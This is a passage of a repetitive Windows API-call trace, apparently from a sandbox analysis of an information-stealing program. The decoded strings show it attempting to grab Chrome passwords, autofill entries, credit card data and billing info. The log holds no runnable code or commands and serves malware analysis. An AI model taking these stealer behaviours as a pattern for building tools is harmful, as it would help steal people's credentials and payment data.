lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.186] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bc90 [0180.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a441c0, cbMultiByte=-1, lpWideCharStr=0x3234bc90, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.187] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615d60, lpBuffer=0x32a44250, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32a44250*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44250, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0180.187] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e50210 [0180.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44250, cbMultiByte=-1, lpWideCharStr=0x32e50210, cchWideChar=31 | out: lpWideCharStr="Failed to grab autofill data: ") returned 31 [0180.187] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f110, lpBuffer=0x32e41410, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e41410*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41410, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.187] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b8f0 [0180.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e41410, cbMultiByte=-1, lpWideCharStr=0x3234b8f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.187] SetEvent (hEvent=0x1b4) returned 1 [0180.192] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a441c0 | out: hHeap=0x2150000) returned 1 [0180.192] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44250 | out: hHeap=0x2150000) returned 1 [0180.192] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41410 | out: hHeap=0x2150000) returned 1 [0180.192] GetTickCount () returned 0x207e654 [0180.193] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f6c0 [0180.193] GetTickCount () returned 0x207e654 [0180.193] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bdf0 [0180.193] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e501d0, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x8b8) returned 0x648 [0180.193] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bdf0 | out: hHeap=0x2150000) returned 1 [0180.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.198] GetTickCount () returned 0x207eef9 [0180.198] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41410 [0180.198] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.199] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32a44370 [0180.199] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32a44400 [0180.199] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32803800 [0180.199] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.200] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f440, lpBuffer=0x32a44400, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32a44400*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.200] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bc70 [0180.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44400, cbMultiByte=-1, lpWideCharStr=0x3234bc70, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.201] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x613920, lpBuffer=0x32803800, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32803800*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803800, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0180.201] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32a44490 [0180.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803800, cbMultiByte=-1, lpWideCharStr=0x32a44490, cchWideChar=34 | out: lpWideCharStr="Failed to grab credit card data: ") returned 34 [0180.202] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f110, lpBuffer=0x32a44370, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32a44370*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.202] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234be10 [0180.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44370, cbMultiByte=-1, lpWideCharStr=0x3234be10, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.202] SetEvent (hEvent=0x1b4) returned 1 [0180.207] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44400 | out: hHeap=0x2150000) returned 1 [0180.208] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803800 | out: hHeap=0x2150000) returned 1 [0180.208] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44370 | out: hHeap=0x2150000) returned 1 [0180.208] GetTickCount () returned 0x207eef9 [0180.208] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70740 [0180.208] GetTickCount () returned 0x207eef9 [0180.208] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b830 [0180.208] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e41410, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x1264) returned 0x660 [0180.208] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b830 | out: hHeap=0x2150000) returned 1 [0180.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.211] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.213] GetTickCount () returned 0x207f79f [0180.213] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0180.213] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.213] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32a44590 [0180.213] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32a44620 [0180.213] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32803800 [0180.213] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.213] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f300, lpBuffer=0x32a44620, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32a44620*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.213] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234be30 [0180.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44620, cbMultiByte=-1, lpWideCharStr=0x3234be30, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.213] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x6136b0, lpBuffer=0x32803800, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32803800*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803800, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0180.214] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32a446b0 [0180.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803800, cbMultiByte=-1, lpWideCharStr=0x32a446b0, cchWideChar=35 | out: lpWideCharStr="Failed to grab billing info data: ") returned 35 [0180.214] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f110, lpBuffer=0x32a44590, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32a44590*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44590, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.214] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234ba50 [0180.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32a44590, cbMultiByte=-1, lpWideCharStr=0x3234ba50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.214] SetEvent (hEvent=0x1b4) returned 1 [0180.234] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44620 | out: hHeap=0x2150000) returned 1 [0180.234] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803800 | out: hHeap=0x2150000) returned 1 [0180.234] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44590 | out: hHeap=0x2150000) returned 1 [0180.234] GetTickCount () returned 0x207f7ae [0180.234] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70410 [0180.234] GetTickCount () returned 0x207f7ae [0180.234] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234be50 [0180.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e64b70, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x1268) returned 0x678 [0180.235] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234be50 | out: hHeap=0x2150000) returned 1 [0180.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.265] GetTickCount () returned 0x2080064 [0180.265] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650b0 [0180.266] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.266] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x328038a0 [0180.266] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32803930 [0180.266] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x328039c0 [0180.266] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.266] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f370, lpBuffer=0x32803930, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32803930*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803930, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.267] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234be50 [0180.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803930, cbMultiByte=-1, lpWideCharStr=0x3234be50, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5 [0180.267] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x613950, lpBuffer=0x328039c0, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x328039c0*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328039c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0180.267] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x60) returned 0x32803dd0 [0180.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328039c0, cbMultiByte=-1, lpWideCharStr=0x32803dd0, cchWideChar=45 | out: lpWideCharStr="Grab_Passwords_Chrome(): Can't open database") returned 45 [0180.267] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f2c0, lpBuffer=0x328038a0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x328038a0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328038a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.267] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234ba70 [0180.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328038a0, cbMultiByte=-1, lpWideCharStr=0x3234ba70, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.268] SetEvent (hEvent=0x1b4) returned 1 [0180.269] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803930 | out: hHeap=0x2150000) returned 1 [0180.269] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x328039c0 | out: hHeap=0x2150000) returned 1 [0180.269] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x328038a0 | out: hHeap=0x2150000) returned 1 [0180.269] GetTickCount () returned 0x2080064 [0180.269] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70860 [0180.270] GetTickCount () returned 0x2080064 [0180.270] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bcd0 [0180.270] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e650b0, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0x1274) returned 0x690 [0180.271] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bcd0 | out: hHeap=0x2150000) returned 1 [0180.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.297] GetTickCount () returned 0x2080919 [0180.297] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0180.297] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.297] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32803950 [0180.297] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x328039e0 [0180.297] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e71ed0 [0180.297] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.297] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f460, lpBuffer=0x328039e0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x328039e0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328039e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.298] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b7b0 [0180.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328039e0, cbMultiByte=-1, lpWideCharStr=0x3234b7b0, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5 [0180.298] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615d20, lpBuffer=0x32e71ed0, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e71ed0*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0180.298] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32803f50 [0180.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71ed0, cbMultiByte=-1, lpWideCharStr=0x32803f50, cchWideChar=29 | out: lpWideCharStr="unable to open database file") returned 29 [0180.298] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f370, lpBuffer=0x32803950, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32803950*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803950, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.298] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234ba90 [0180.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803950, cbMultiByte=-1, lpWideCharStr=0x3234ba90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.298] SetEvent (hEvent=0x1b4) returned 1 [0180.301] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x328039e0 | out: hHeap=0x2150000) returned 1 [0180.301] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71ed0 | out: hHeap=0x2150000) returned 1 [0180.301] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803950 | out: hHeap=0x2150000) returned 1 [0180.301] GetTickCount () returned 0x2080919 [0180.301] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e701a0 [0180.301] GetTickCount () returned 0x2080919 [0180.301] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bc30 [0180.301] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e65070, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0xd58) returned 0x6a8 [0180.302] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bc30 | out: hHeap=0x2150000) returned 1 [0180.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.318] GetTickCount () returned 0x20811bf [0180.318] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f30 [0180.319] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.319] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32803b00 [0180.319] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32803b90 [0180.319] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e71ed0 [0180.319] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.320] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f370, lpBuffer=0x32803b90, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32803b90*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803b90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.320] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bd50 [0180.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803b90, cbMultiByte=-1, lpWideCharStr=0x3234bd50, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.320] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615ca0, lpBuffer=0x32e71ed0, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e71ed0*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0180.321] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32803c20 [0180.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71ed0, cbMultiByte=-1, lpWideCharStr=0x32803c20, cchWideChar=27 | out: lpWideCharStr="Failed to grab passwords: ") returned 27 [0180.321] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f3d0, lpBuffer=0x32803b00, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32803b00*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.321] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bcb0 [0180.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803b00, cbMultiByte=-1, lpWideCharStr=0x3234bcb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.322] SetEvent (hEvent=0x1b4) returned 1 [0180.327] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803b90 | out: hHeap=0x2150000) returned 1 [0180.327] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e71ed0 | out: hHeap=0x2150000) returned 1 [0180.327] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803b00 | out: hHeap=0x2150000) returned 1 [0180.327] GetTickCount () returned 0x20811bf [0180.327] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e709e0 [0180.327] GetTickCount () returned 0x20811bf [0180.327] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b910 [0180.327] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x111a60, lpParameter=0x32e64f30, dwCreationFlags=0x0, lpThreadId=0x87fd8c | out: lpThreadId=0x87fd8c*=0xd18) returned 0x6c0 [0180.327] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b910 | out: hHeap=0x2150000) returned 1 [0180.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0180.352] GetTickCount () returned 0x2081a83 [0180.352] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0180.352] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x102 [0180.352] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32803d10 [0180.352] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e71ed0 [0180.352] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x400) returned 0x32e71f60 [0180.352] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110068, lpBuffer=0x87fcd8, nSize=0x38, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x87fcd8*, lpNumberOfBytesRead=0x87fc58*=0x38) returned 1 [0180.352] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f410, lpBuffer=0x32e71ed0, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e71ed0*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.353] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bab0 [0180.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71ed0, cbMultiByte=-1, lpWideCharStr=0x3234bab0, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5 [0180.353] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x615f60, lpBuffer=0x32e71f60, nSize=0x3ff, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32e71f60*, lpNumberOfBytesRead=0x87fc58*=0x3ff) returned 1 [0180.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71f60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0180.353] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e72370 [0180.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e71f60, cbMultiByte=-1, lpWideCharStr=0x32e72370, cchWideChar=31 | out: lpWideCharStr="Failed to grab autofill data: ") returned 31 [0180.353] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x61f2e0, lpBuffer=0x32803d10, nSize=0x7f, lpNumberOfBytesRead=0x87fc58 | out: lpBuffer=0x32803d10*, lpNumberOfBytesRead=0x87fc58*=0x7f) returned 1 [0180.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32803d10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1 [0180.353] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 